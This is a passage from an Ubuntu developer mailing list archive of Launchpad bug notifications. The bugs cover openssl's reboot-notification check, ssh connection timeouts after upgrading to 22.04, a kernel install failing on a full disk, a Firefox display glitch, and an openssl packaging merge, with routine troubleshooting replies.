exception, another exception occurred: Traceback (most recent call last): File "", line 1, in File "/usr/lib/python3/dist-packages/requests/api.py", line 76, in get return request('get', url, params=params, **kwargs) File "/usr/lib/python3/dist-packages/requests/api.py", line 61, in request return session.request(method=method, url=url, **kwargs) File "/usr/lib/python3/dist-packages/requests/sessions.py", line 542, in request resp = self.send(prep, **send_kwargs) File "/usr/lib/python3/dist-packages/requests/sessions.py", line 655, in send r = adapter.send(request, **kwargs) File "/usr/lib/python3/dist-packages/requests/adapters.py", line 514, in send raise SSLError(e, request=request) requests.exceptions.SSLError: HTTPSConnectionPool(host='server_url', port=443): Max retries exc
[Touch-packages] [Bug 1971650] Re: wrong check for "server" in libssl3.postinst
Possibly related to https://bugs.launchpad.net/bugs/1832421 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1971650 Title: wrong check for "server" in libssl3.postinst Status in openssl package in Ubuntu: New Bug description: A security update has just been applied to my system for openssl, and the 'reboot required' message just popped on my desktop. I looked to see why this was, and found the following code in the libssl3 postinst:

```
# Here we issue the reboot notification for upgrades and
# security updates. We do want services to be restarted when we
# update for a security issue, but planned by the sysadmin, not
# automatically.
# Only issue the reboot notification for servers; we proxy this by
# testing that the X server is not running (LP: #244250)
if ! pidof /usr/lib/xorg/Xorg > /dev/null && [ -x /usr/share/update-notifier/notify-reboot-required ]; then
    /usr/share/update-notifier/notify-reboot-required
fi
```

Now, AFAIK this is the only package that interfaces with notify-reboot-required but omits the notification on desktops, so that seems to be an inconsistent policy; but even if we thought that was the correct policy to apply, the above check for a desktop is not because it doesn't match in the case the user is running Xwayland, which most users not using the nvidia driver will be doing now by default. Also, this is now inside a block that checks for the presence of needrestart, which is part of the server seed; so in effect this notification now *never* fires on servers, it *only* fires on desktops.
ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: openssl 3.0.2-0ubuntu1.1 ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30 Uname: Linux 5.15.0-27-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: ubuntu:GNOME Date: Thu May 5 05:39:06 2022 InstallationDate: Installed on 2019-12-23 (863 days ago) InstallationMedia: Ubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017) RebootRequiredPkgs: Error: path contained symlinks. SourcePackage: openssl UpgradeStatus: Upgraded to jammy on 2022-04-15 (19 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1971650/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1971888] [NEW] Can not ssh to github.com or gitlab.com when upgrading to 22.04
On Thu, May 05, 2022 at 09:09:07PM -, Alvaro wrote: > acs@lsp-022:~$ ssh -vT g...@github.com > ... > debug1: connect to address 140.82.121.4 port 22: Connection timed out Note that "Connection timed out" is an error at the TCP level, that indicates that your computer wasn't able to establish a TCP session. ssh's algorithm choices aren't involved yet. Are you sure this machine can communicate with 140.82.121.4:22 at all? $ nc 140.82.112.4 22 SSH-2.0-babeld-78a8149e ^C Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu. https://bugs.launchpad.net/bugs/1971888 Title: Can not ssh to github.com or gitlab.com when upgrading to 22.04 Status in openssh package in Ubuntu: New Bug description: Dear all, After the upgrading to Ubuntu 22.04 I can not use git over ssh. The best way to reproduce the error is: ``` acs@lsp-022:~$ ssh -vT g...@github.com OpenSSH_8.9p1 Ubuntu-3, OpenSSL 3.0.2 15 Mar 2022 debug1: Reading configuration data /etc/ssh/ssh_config debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf matched no files debug1: /etc/ssh/ssh_config line 21: Applying options for * debug1: Connecting to github.com [140.82.121.4] port 22. debug1: connect to address 140.82.121.4 port 22: Connection timed out ``` Before the upgrading I can connect correctly with: ``` ssh -vT g...@github.com OpenSSH_8.2p1 Ubuntu-4ubuntu0.4, OpenSSL 1.1.1f 31 Mar 2020 debug1: Reading configuration data /etc/ssh/ssh_config debug1: /etc/ssh/ssh_config line 21: include /etc/ssh/ssh_config.d/*.conf matched no files debug1: /etc/ssh/ssh_config line 23: Applying options for * debug1: Connecting to github.com [140.82.121.4] port 22. debug1: Connection established ``` The same issue is happening with gitlab.com. Probably it is related with the OpenSSL version. Cheers! 
-- Alvaro ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: ssh 1:8.9p1-3 ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30 Uname: Linux 5.15.0-27-generic x86_64 ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: GNOME Date: Thu May 5 23:00:33 2022 InstallationDate: Installed on 2021-03-08 (423 days ago) InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1) PackageArchitecture: all SourcePackage: openssh UpgradeStatus: Upgraded to jammy on 2022-05-05 (0 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1971888/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1971101] Re: package linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1
Hello, note your filesystem is full:

```
Filesystem     1K-blocks     Used Available Use% Mounted on
udev              981292        0    981292   0% /dev
tmpfs             202808     1508    201300   1% /run
/dev/sda5       11167656 11000192         0 100% /
```

That causes errors like this:

```
cp: error writing '/var/tmp/mkinitramfs_jx7Z98//usr/bin/kmod': No space left on device
cp: error writing '/var/tmp/mkinitramfs_jx7Z98//usr/lib/x86_64-linux-gnu/liblzma.so.5.2.4': No space left on device
mkdir: cannot create directory ‘/var/tmp/mkinitramfs_jx7Z98/etc/modprobe.d’: No space left on device
mkdir: cannot create directory ‘/var/tmp/mkinitramfs_jx7Z98/lib/modprobe.d’: No space left on device
mkdir: cannot create directory ‘/var/tmp/mkinitramfs_jx7Z98//etc/modprobe.d’: No space left on device
```

These errors are preventing your system update from finishing. Free up some space on the root filesystem, and then try:

    sudo apt install -f

or

    sudo dpkg --configure -a

The full screen issue may require talking with VirtualBox support. Thanks ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu. https://bugs.launchpad.net/bugs/1971101 Title: package linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1 Status in initramfs-tools package in Ubuntu: New Bug description: Slow system. I get notified all the time. Oh, by the way, I need help getting this virtual screen to go back full screen. Thanks!
ProblemType: Package DistroRelease: Ubuntu 20.04 Package: linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 ProcVersionSignature: Ubuntu 5.11.0-41.45~20.04.1-generic 5.11.22 Uname: Linux 5.11.0-41-generic x86_64 ApportVersion: 2.20.11-0ubuntu27.21 Architecture: amd64 CasperMD5CheckResult: skip Date: Sun May 1 01:38:42 2022 ErrorMessage: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1 InstallationDate: Installed on 2021-10-01 (212 days ago) InstallationMedia: Ubuntu 20.04.3 LTS "Focal Fossa" - Release amd64 (20210819) Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 3.8.2-0ubuntu2 PythonDetails: N/A RelatedPackageVersions: dpkg 1.19.7ubuntu3 apt 2.0.6 SourcePackage: initramfs-tools Title: package linux-image-5.13.0-40-generic 5.13.0-40.45~20.04.1 failed to install/upgrade: run-parts: /etc/kernel/postinst.d/initramfs-tools exited with return code 1 UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1971101/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1971221] Re: firefox is flashing
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1971221

Title: firefox is flashing

Status in xorg package in Ubuntu: New

Bug description: When the firefox window is behind other APP windows, it is flashing.

ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-27.28-generic 5.15.30 Uname: Linux 5.15.0-27-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia .proc.driver.nvidia.capabilities.gpu0: Error: path was not a regular file. .proc.driver.nvidia.capabilities.mig: Error: path was not a regular file. .proc.driver.nvidia.gpus..01.00.0: Error: path was not a regular file.
.proc.driver.nvidia.registry: Binary: "" .proc.driver.nvidia.suspend: suspend hibernate resume .proc.driver.nvidia.suspend_depth: default modeset uvm .proc.driver.nvidia.version: NVRM version: NVIDIA UNIX x86_64 Kernel Module 510.60.02 Wed Mar 16 11:24:05 UTC 2022 GCC version: ApportVersion: 2.20.11-0ubuntu82 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: pass CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Tue May 3 11:53:34 2022 DistUpgraded: Fresh install DistroCodename: jammy DistroVariant: ubuntu GraphicsCard: NVIDIA Corporation GP104 [GeForce GTX 1080] [10de:1b80] (rev a1) (prog-if 00 [VGA controller]) Subsystem: Hewlett-Packard Company GP104 [GeForce GTX 1080] [103c:82fb] InstallationDate: Installed on 2022-05-01 (1 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 (20220419) MachineType: ASUS System Product Name ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.15.0-27-generic root=UUID=ff0f1b3b-e57d-46bf-817b-a2bf7bd47098 ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 04/01/2022 dmi.bios.release: 14.4 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: 1404 dmi.board.asset.tag: Default string dmi.board.name: ROG STRIX Z690-A GAMING WIFI D4 dmi.board.vendor: ASUSTeK COMPUTER INC. dmi.board.version: Rev 1.xx dmi.chassis.asset.tag: Default string dmi.chassis.type: 3 dmi.chassis.vendor: Default string dmi.chassis.version: Default string dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvr1404:bd04/01/2022:br14.4:svnASUS:pnSystemProductName:pvrSystemVersion:rvnASUSTeKCOMPUTERINC.:rnROGSTRIXZ690-AGAMINGWIFID4:rvrRev1.xx:cvnDefaultstring:ct3:cvrDefaultstring:skuSKU: dmi.product.family: To be filled by O.E.M. 
dmi.product.name: System Product Name dmi.product.sku: SKU dmi.product.version: System Version dmi.sys.vendor: ASUS version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.110-1ubuntu1 version.libgl1-mesa-dri: libgl1-mesa-dri 22.0.1-1ubuntu2 version.libgl1-mesa-glx: libgl1-mesa-glx N/A version.nvidia-graphics-drivers: nvidia-graphics-drivers-* N/A version.xserver-xorg-core: xserver-xorg-core 2:21.1.3-2ubuntu2 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2build3 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20210115-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-2build1
[Touch-packages] [Bug 1608200] Re: please merge openssl from Debian
** Changed in: openssl (Ubuntu) Status: Incomplete => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/1608200 Title: please merge openssl from Debian Status in openssl package in Ubuntu: Fix Released Bug description: I'm not aware of any ABI breakages, but I bumped the shlibs min version anyway. Please triple check + dh_makeshlibs -a -V "libssl1.0.0 (>= 1.0.2h)" --add-udeb="libcrypto1.0.0-udeb" -Xengines
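Review bot: the added dh_makeshlibs line raises the shlibs floor to "libssl1.0.0 (>= 1.0.2h)" while the description says no ABI breakage is known, so the reason for choosing 1.0.2h is not recorded anywhere in the change. Packages whose library dependency is generated from this shlibs entry will inherit the tighter version, so the changelog entry should state what motivates the new minimum; if a comparison of the exported symbols against the previously shipped library shows nothing new, keeping the earlier -V value would avoid the stricter dependency.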